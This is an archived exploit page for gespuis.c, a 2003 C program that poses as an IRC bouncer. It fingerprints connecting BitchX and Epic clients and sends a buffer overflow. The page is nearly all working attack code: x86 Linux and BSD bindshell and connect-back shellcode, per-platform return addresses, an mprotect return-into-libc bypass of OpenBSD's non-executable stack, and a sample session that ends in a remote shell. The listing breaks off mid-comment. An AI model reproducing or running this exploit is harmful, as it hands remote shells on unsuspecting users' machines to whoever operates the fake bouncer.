what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

gespuis.c

gespuis.c
Posted Mar 29, 2003
Authored by eSDee, netric | Site netric.org

Gespuis acts as an irc bouncer and exploits BitchX/Epic clients spawning a bindshell.

tags | exploit
SHA-256 | dd15eaa198ba5124d4a8fee6a3430072539d129c6f1f74f1e39e66f5101144cb

gespuis.c

Change Mirror Download
/*          _ ________            _____                        ______   06-03-2
003
__ ___ ____ /____.------` /_______.------.___.----` ___/____ ____
___
_/ \ _ /\ __. __// ___/_ ___. /_\ /_ | _/
___ ._\ . \\ /__ _____/ _ / \_ | /__ | _| slc | _____
_
- -------\______||--._____\---._______//-|__ //-.___|----._____||
/ \ /
remote BitchX/Epic Exploit (serverside) \/ by eSDee of Net
ric
-----------------------------------------------------------------------------
---
(www.netric.be|o
rg)

"gespuis.c" is an irc bouncer, that can exploit BitchX/Epic clients.
Copyright (c) 2003 Netric Security
All rights reserved.

[esdee@flopppp]$ ./gespuis -v irc.netric.org
[remote BitchX/Epic exploit (serverside) by eSDee of Netric (www.netric.be|or
g)]
-----------------------------------------------------------------------------
---
Verbose mode.
Waiting for connections...
[10.0.0.2] Connected... [esdee]
[10.0.0.2] Sending CTCP VERSION...
[10.0.0.2] Client version: BitchX-1.0c17+ by panasync - OpenBSD 3.2
[10.0.0.2] Target found. [ret: 0xcfbf7c1c]
[10.0.0.2] Bindshell is running on port 0xb0ef(45295).

[esdee@flopppp]$ telnet 10.0.0.2 45295
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.
uname -a; id;
OpenBSD pant0ffel 3.2 pant0ffel#1 i386
uid=1000(esdee) gid=1000(esdee) groups=1000(esdee), 0(wheel)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <ctype.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>

char
jmp_code[] =

/* jumps 0xff bytes ahead.. */
"\xeb\x09\x58\x31\xdb\xb3\xff\x01\xd8\xff\xe0\xe8\xf2\xff\xff\xff";

char
BSD_bindcode[] =

/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
"\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
"\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
"\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"

/* forking bindcode (port 0xb0ef)*/
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a";

char
BSD_connect_back[] =

/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
"\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
"\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
"\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"

/* connect back shellcode (port=0xb0ef) */
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

char
linux_bindcode[] =

/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
"\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
"\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
"\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"

/* forking bindcode (port 0xb0ef)*/
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
"\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
linux_connect_back[] =

/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
"\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
"\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
"\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"

/* connect back shellcode (port=0xb0ef) */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";

struct {
char *version;
unsigned long ret;
unsigned long mprotect;
char *shellcode;
int type;
} targets[] = {

/* FreeBSD targets tested on:
- FreeBSD 4.7-RELEASE-p3
- FreeBSD 4.6.2-RELEASE
- FreeBSD 4.6
- FreeBSD 4.5-RELEASE

OpenBSD targets:
- OpenBSD 3.2
- OpenBSD 3.1
- OpenBSD 3.0
- OpenBSD 2.x

Linux targets:
- Redhat 8.0
- Redhat 7.x
- Debian 3.0
- Mandrake 8.x
- Mandrake 9.0
- Slackware 8.x
- Trustix 1.x

Types:
0 - BitchX (Linux)
1 - BitchX (BSD)
2 - BitchX (BSD - Return into libc - mprotect() (To break the k-rad
theo protection :)
3 - Epic (Linux)
4 - Epic (BSD)
5 - Epic (BSD - Return into libc - mprotect())
*/

/* Auto targets */

{ "BitchX-1.0c19+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
{ "BitchX-1.0c18+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
{ "BitchX-1.0c17+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
{ "BitchX-1.0c16+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000,
linux_bindcode, 0},
{ "BitchX-1.0c19+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c18+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c17+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c16+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c19+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c18+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c17+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c16+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c19+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ec230,
BSD_bindcode, 2},
{ "BitchX-1.0c18+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ce230,
BSD_bindcode, 2},
{ "BitchX-1.0c17+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230,
BSD_bindcode, 2},
{ "BitchX-1.0c16+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230,
BSD_bindcode, 2},
{ "BitchX-1.0c19+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c18+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c17+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c16+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c19+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c18+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c17+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "BitchX-1.0c16+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000,
BSD_bindcode, 1},
{ "ircII EPIC4-1.1.10 Linux 2.", 0xbfffddf0, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.7 Linux 2.", 0xbfffddf0, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.6 Linux 2.", 0xbfffddf0, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.10 FreeBSD 4", 0xbfbfdf64, 0x00000000,
BSD_bindcode, 4},
{ "ircII EPIC4-1.1.7 FreeBSD 4", 0xbfbfdf64, 0x00000000,
BSD_bindcode, 4},
{ "ircII EPIC4-1.1.6 FreeBSD 4", 0xbfbfdf64, 0x00000000,
BSD_bindcode, 4},
{ "ircII EPIC4-1.1.10 OpenBSD 3.2", 0xcfbf6d74, 0x4026b230,
BSD_bindcode, 5},
{ "ircII EPIC4-1.1.7 OpenBSD 3.2", 0xcfbfbe64, 0x40265230,
BSD_bindcode, 5},
{ "ircII EPIC4-1.1.6 OpenBSD 3.2", 0xcfbfbe64, 0x40264230,
BSD_bindcode, 5},
{ "ircII EPIC4-1.1.10 OpenBSD 3", 0xdfbf7094, 0x00000000,
BSD_bindcode, 4},
{ "ircII EPIC4-1.1.7 OpenBSD 3", 0xdfbf7094, 0x00000000,
BSD_bindcode, 4},
{ "ircII EPIC4-1.1.6 OpenBSD 3", 0xdfbf7094, 0x00000000,
BSD_bindcode, 4},

/* manual targets (thanks lucipher and thorax!) */

{ "BitchX-1.0cX - Redhat 8.0", 0xbfff9bd8, 0x00000000,
linux_bindcode, 1},
{ "BitchX-1.0cX - Redhat 7.x", 0xbfff9bd8, 0x00000000,
linux_bindcode, 1},
{ "BitchX-1.0cX - Debian 3.x", 0xbfff9f0c, 0x00000000,
linux_bindcode, 1},
{ "BitchX-1.0cX - Mandrake 9.0", 0xbfff9af0, 0x00000000,
linux_bindcode, 1},
{ "BitchX-1.0cX - Mandrake 8.x", 0xbfff9af0, 0x00000000,
linux_bindcode, 1},
{ "BitchX-1.0cX - Slackware 8.x", 0xbfff9bd8, 0x00000000,
linux_bindcode, 1},
{ "BitchX-1.0cX - Trustix 1.x", 0x7fff9ddc, 0x00000000,
linux_bindcode, 1},
{ "ircII EPIC4-1.1.x Redhat 8.0", 0xbfffdf64, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.x Redhat 7.x", 0xbfffdf64, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.x Debian 3.x", 0xbfff9004, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.x Mandrake 9.0", 0xbfffdf10, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.x Mandrake 8.x", 0xbfffdf10, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.x Slackware 8.x", 0xbfffddf0, 0x00000000,
linux_bindcode, 3},
{ "ircII EPIC4-1.1.x Trustix 1.x", 0x7fff8f74, 0x00000000,
linux_bindcode, 3},
{ "Crash - All platforms", 0xBADe5Dee, 0x00000000,
linux_bindcode, 0},
};

FILE *log = NULL;

void
usage(char *prog)
{
fprintf(stderr, "Usage : %s [-c ip address] [-l file] [-p port] [-t ta
rget] [-v] <ircd:port>\n"
"Example: %s -l /var/log/owned -p 6667 -v irc.netric.or
g:6668\n\n"
"-c ip address connect back shellcode (port 4
5295)\n"
"-l logfile log output to file\n"
"-p port the bouncer port\n"
"-t target force target, don't CTCP versi
on. (Use -t0 for a list)\n"
"-v verbose mode\n\n", prog, prog)
;
exit(1);
}

int
send_text(int sock, char *format, ... )
{
char buffer[4096];
va_list arglist;
va_start (arglist, format);
vsnprintf(buffer, sizeof(buffer) - 1, format, arglist );
va_end(arglist);
return send(sock, buffer, strlen(buffer), 0);
}

int
main(int argc, char *argv[])
{
char read_buf [4096];
char log_buffer [1200];
char ret_buffer [128];
char buffer [600];

char sh_buffer [2000];
char sh_host [36];

char version [256];
char nick [256];
char user [256];
char ircd_host [256];

char *ptr;

unsigned int port = 6667;
unsigned int ircd_port = 6667;
unsigned int type = 0;
unsigned int bytes = 0;

struct sockaddr_in saddr_in1;
struct sockaddr_in saddr_in2;
struct sockaddr_in saddr_in3;

struct hostent *hp;

int sock_server = 0;
int sock_server_new = 0;
int sock_ircd = 0;

int sin_size = sizeof(struct sockaddr_in);
int i = 0;
int k = 0;
int size = 0;
int opt = 0;
int verbose = 0;
int connectback = 0;
int ip1 = 0;
int ip2 = 0;
int ip3 = 0;
int ip4 = 0;

fd_set fd_read;

fprintf(stdout, "[remote BitchX/Epic exploit (serverside) by eSDee of N
etric (www.netric.be|org)]\n"
"------------------------------------------------------
--------------------------\n");

while((opt = getopt(argc,argv,"c:l:p:t:v")) !=EOF) {
switch(opt) {

case 'c':
sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3,
&ip4);

linux_connect_back[171] = ip1; BSD_connect_back
[162] = ip1;
linux_connect_back[172] = ip2; BSD_connect_back
[163] = ip2;
linux_connect_back[173] = ip3; BSD_connect_back
[164] = ip3;
linux_connect_back[174] = ip4; BSD_connect_back
[165] = ip4;

for(i = 0; i < sizeof(targets) / 20; i++) {
switch(targets[i].type) {
case 0:
targets[i].shellcode =
linux_connect_back;
break;
case 3:
targets[i].shellcode =
linux_connect_back;
break;
default:
targets[i].shellcode =
BSD_connect_back;
break;
}
}

fprintf(stdout, "Connecting to: %d.%d.%d.%d:452
95\n", ip1, ip2, ip3, ip4);
connectback = 1;
break;
case 'l':
if ((log = fopen(optarg,"aw")) == NULL) {
fprintf(stderr, "Unable to open %s.\n",
optarg);
return -1;
}
break;
case 'p':
port=atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr,"Invalid port.\n");
return -1;
}
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 20) {
for(i = 0; i < sizeof(targets) / 20; i
++)
fprintf(stderr, "%02d. [0x%08x]
- %s\n", i + 1,
(unsigned)targets[i].re
t, targets[i].version);
fprintf(stderr, "\n");
return -1;
}

fprintf(stdout, "Selected: %s [0x%08x]\n", targ
ets[type - 1].version, (unsigned)targets[type - 1].ret);
break;
case 'v':
fprintf(stdout, "Verbose mode.\n");
verbose = 1;
break;
default:
usage(argv[0] == NULL ? "gespuis" : argv[0]);
break;
}
}

if (argv[optind] == NULL) usage(argv[0] == NULL ? "gespuis" : argv[0]);


sscanf(argv[optind], "%255[^:]:%u", ircd_host, &ircd_port);

if ((ircd_port <= 0) || (ircd_port > 65535)) {
fprintf(stderr,"Invalid ircd port.\n");
return -1;
}

if ((hp = gethostbyname(ircd_host)) == NULL) {
fprintf(stderr, "Unable to resolve %s...\n", ircd_host);
return -1;
}

memset((char *)&saddr_in3, 0x0, sizeof(saddr_in3));
memcpy((char *)&saddr_in3.sin_addr, hp->h_addr, hp->h_length);

saddr_in3.sin_family = AF_INET;
saddr_in3.sin_port = htons(ircd_port);

if ((sock_server = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
fprintf(stderr, "socket error.\n");
return -1;
}

setsockopt(sock_server, SOL_SOCKET, SO_REUSEADDR, &sin_size, sizeof(sin
_size));

saddr_in1.sin_family = AF_INET;
saddr_in1.sin_port = htons(port);
saddr_in1.sin_addr.s_addr = INADDR_ANY;

memset(&saddr_in1.sin_zero, 0x0, 8);

if (bind(sock_server, (struct sockaddr *)&saddr_in1, sizeof(struct sock
addr)) == -1) {
fprintf(stderr, "bind error.\n");
return -1;
}

if (listen(sock_server, 10) == -1) {
fprintf(stderr, "listen.\n");
return -1;
}

signal(SIGCHLD, SIG_IGN);

fprintf(stdout, "Waiting for connections...\n");

while(1) {

if ((sock_server_new = accept(sock_server, (struct sockaddr *)&saddr_in
2, &sin_size)) == -1) {
perror("accept");
continue;
}

if (!fork()) {

close(sock_server);

memset(version, 0x0, sizeof(version));
memset(read_buf, 0x0, sizeof(read_buf));

while(1) {

if (recv(sock_server_new, read_buf, sizeof(read
_buf) - 1, 0) < 0) {
close(sock_server_new);
exit(1);
}

ptr = strstr(read_buf, "NICK ");

if (ptr != NULL) {
memset(nick, 0x00, sizeof(nick));
strncpy(nick, ptr + 5, sizeof(nick) - 1
);

for (i = 0; i < strlen(nick); i++)
if(!isprint(nick[i])) nick[i] =
0x00;

if (verbose == 1) fprintf(stdout, "[%s]
Connected... [%s]\n",
inet_nt
oa(saddr_in2.sin_addr), nick);
}

ptr = strstr(read_buf, "USER ");

if (ptr != NULL) {
memset(user, 0x00, sizeof(user));
strncpy(user, ptr + 5, sizeof(user) - 1
);

for (i = 0; i < strlen(user); i++)
if (!isprint(user[i])) user[i]
= 0x00;
}

if (strlen(nick) != 0 && strlen(user) != 0) bre
ak;
memset(read_buf, 0x0, sizeof(read_buf));
}

if (type == 0) {

if (verbose == 1) fprintf(stdout, "[%s] Sending
CTCP VERSION...\n", inet_ntoa(saddr_in2.sin_addr));

if (send_text(sock_server_new, ":stats!netric@n
etric.org PRIVMSG a: %cVERSION%c\n", 0x01, 0x01) < 0) {
if (verbose == 1) fprintf(stderr, "[%s]
send failed!\n", inet_ntoa(saddr_in2.sin_addr));
close(sock_server_new);
exit(1);
}

while(1) {

if (recv(sock_server_new, read_buf, siz
eof(read_buf) - 1, 0) < 0) {
close(sock_server_new);
exit(1);
}

ptr = strstr(read_buf, "VERSION ");

if (ptr != NULL) {

for (i = 0; i < sizeof(version)
- 1; i++) {
if (isprint(*(ptr + i +
8))) {
version[k] = *(
ptr + i + 8);
k++;
}

if (*(ptr + i + 8) == '
:' && *(ptr + i + 7) == ' ') {
version[k - 2]
= 0x00;
break;
}

if (*(ptr + i + 8) ==
'-' && *(ptr + i + 9) == ' ' &&
*(ptr + i + 10) ==
'A' && *(ptr + i + 11) == 'c') {
version[k - 2]
= 0x00;
break;
}
}

if (verbose == 1) fprintf(stdou
t, "[%s] Client version: %s\n", inet_ntoa(saddr_in2.sin_addr), version);
break;
}

memset(read_buf, 0x0, sizeof(read_buf))
;
}

if (strlen(version) == 0) {
if (verbose == 1) fprintf(stderr, "[%s] No vers
ion given.\n", inet_ntoa(saddr_in2.sin_addr));
close(sock_server_new);
exit(1);
}

for(i = 0; i < (sizeof(targets) / 20) - 1; i++) {
if (memcmp(version, targets[i].version,
strlen(targets[i].version)) == 0) {
type = i + 1;
if (verbose == 1) fprintf(stder
r, "[%s] Target found. [ret: 0x%08x]\n",
inet_ntoa(saddr_in2.sin
_addr), (unsigned) targets[type - 1].ret);
break;
}
}

if (type == 0) {
if (verbose == 1) fprintf(stderr, "[%s]
Not found, bouncing to [%s:%u] ...\n",

inet_ntoa(saddr_in2.sin_addr),

ircd_host, ircd_port);

if ((sock_ircd = socket(AF_INET, SOCK_S
TREAM, 0)) == -1) {
if (verbose == 1) fprintf(stder
r, "[%s] socket error.\n",
inet_ntoa(saddr_in2.sin
_addr));
close(sock_server_new);
exit(1);
}

if (connect(sock_ircd, (struct sockaddr
*)&saddr_in3, sizeof(saddr_in3)) == -1) {
if (verbose == 1) fprintf(stder
r, "[%s] Unable to connect to [%s:%u].\n",
inet_ntoa(saddr_in2.sin
_addr), ircd_host, ircd_port);
close(sock_server_new);
close(sock_ircd);
exit(1);
}

memset(log_buffer, 0x00, sizeof(log_buf
fer));
snprintf(log_buffer, sizeof(log_buffer)
- 1,
"NICK %s\nUSER %s\n", nick, use
r);


if (send(sock_ircd, log_buffer, strlen(
log_buffer), 0) < 0) {
close(sock_server_new);
close(sock_ircd);
exit(1);
}

memset(read_buf, 0x00, sizeof(read_buf)
);
bytes = 1;

while (bytes) {

FD_ZERO(&fd_read);
FD_SET(sock_server_new, &fd_rea
d);
FD_SET(sock_ircd, &fd_read);

select(FD_SETSIZE, &fd_read, NU
LL, NULL, NULL);

if (FD_ISSET(sock_ircd, &fd_rea
d)) {

memset(read_buf, 0x00,
sizeof(read_buf));
bytes = recv(sock_ircd,
read_buf, sizeof(read_buf), 4);
if (bytes) send(sock_se
rver_new, read_buf, bytes, 4);

} else if (FD_ISSET(sock_server
_new, &fd_read)) {

memset(&read_buf, 0x00,
sizeof(read_buf));
bytes = recv(sock_serve
r_new, read_buf, sizeof(read_buf), 4);
if (bytes) send(sock_ir
cd, read_buf, bytes, 4);
}
}

close(sock_ircd);
close(sock_server_new);
exit(1);
}
}

k = 69;
i = 0;

memset(sh_host, 0x00, sizeof(sh_host));
if (targets[type - 1].type < 3) {
snprintf(sh_host, sizeof(sh_host) - 1, "BitchX
%s:%d", ircd_host, ircd_port);
} else {
snprintf(sh_host, sizeof(sh_host) - 1, "epic %s
:%d", ircd_host, ircd_port);
}

strncat(sh_host, " "
,
sizeof(sh_host) - strlen(sh_host) - 1)
;
while (1) {

if (sh_host[i + 0] == 0x00) break;
linux_bindcode[k - 3] = sh_host[i + 0];
linux_connect_back[k - 3] = sh_host[i + 0];


if (sh_host[i + 1] == 0x00) break;
linux_bindcode[k - 2] = sh_host[i + 1];
linux_connect_back[k - 2] = sh_host[i + 1];

if (sh_host[i + 2] == 0x00) break;
linux_bindcode[k - 1] = sh_host[i + 2];
linux_connect_back[k - 1] = sh_host[i + 2];

if (sh_host[i + 3] == 0x00) break;
linux_bindcode[k - 0] = sh_host[i + 3];
linux_connect_back[k - 0] = sh_host[i + 3];

k -= 5;
i += 4;
}

k = 64;
i = 0;

while (1) {

if (sh_host[i + 0] == 0x00) break;
BSD_bindcode[k - 3] = sh_host[i + 0];
BSD_connect_back[k - 3] = sh_host[i + 0];

if (sh_host[i + 1] == 0x00) break;
BSD_bindcode[k - 2] = sh_host[i + 1];
BSD_connect_back[k - 2] = sh_host[i + 1];

if (sh_host[i + 2] == 0x00) break;
BSD_bindcode[k - 1] = sh_host[i + 2];
BSD_connect_back[k - 1] = sh_host[i + 2];

if (sh_host[i + 3] == 0x00) break;
BSD_bindcode[k - 0] = sh_host[i + 3];
BSD_connect_back[k - 0] = sh_host[i + 3];

k -= 5;
i += 4;
}

k = 0;

usleep(3000000); /* We have to wait a couple of
seconds,
otherwise BitchX/Epic will i
gnore the clientinfo CTCP. */

memset(sh_buffer, 0x90, sizeof(sh_buffer));
memcpy(sh_buffer + sizeof(sh_buffer) - 1 - strlen(targe
ts[type - 1].shellcode),
targets[type - 1].shellcode, strlen(targets[typ
e - 1].shellcode));
sh_buffer[sizeof(sh_buffer) - 1] = 0x0;

if (send_text(sock_server_new, ":netric!netric@netric.o
rg PRIVMSG a: %s\r\n", sh_buffer) < 0) {
if (verbose == 1) fprintf(stderr, "[%s] send fa
iled!\n", inet_ntoa(saddr_in2.sin_addr));
exit(1);
}

usleep(300000);

if (targets[type - 1].type == 2 || targets[type - 1].ty
pe == 5) {

/* OpenBSD 3.2!

Quote:

"As theo announced on misc@, non-executable sta
ck support is available in the most
recent snapshots for most platforms. In other
words, say goodbye to the vast majority
of buffer overflow attacks against OpenBSD mac
hines :-) "

The stack is non executable at default, so we
use a return into libc technic,
to get the stack executable again. We use the
mprotect() function in libc,
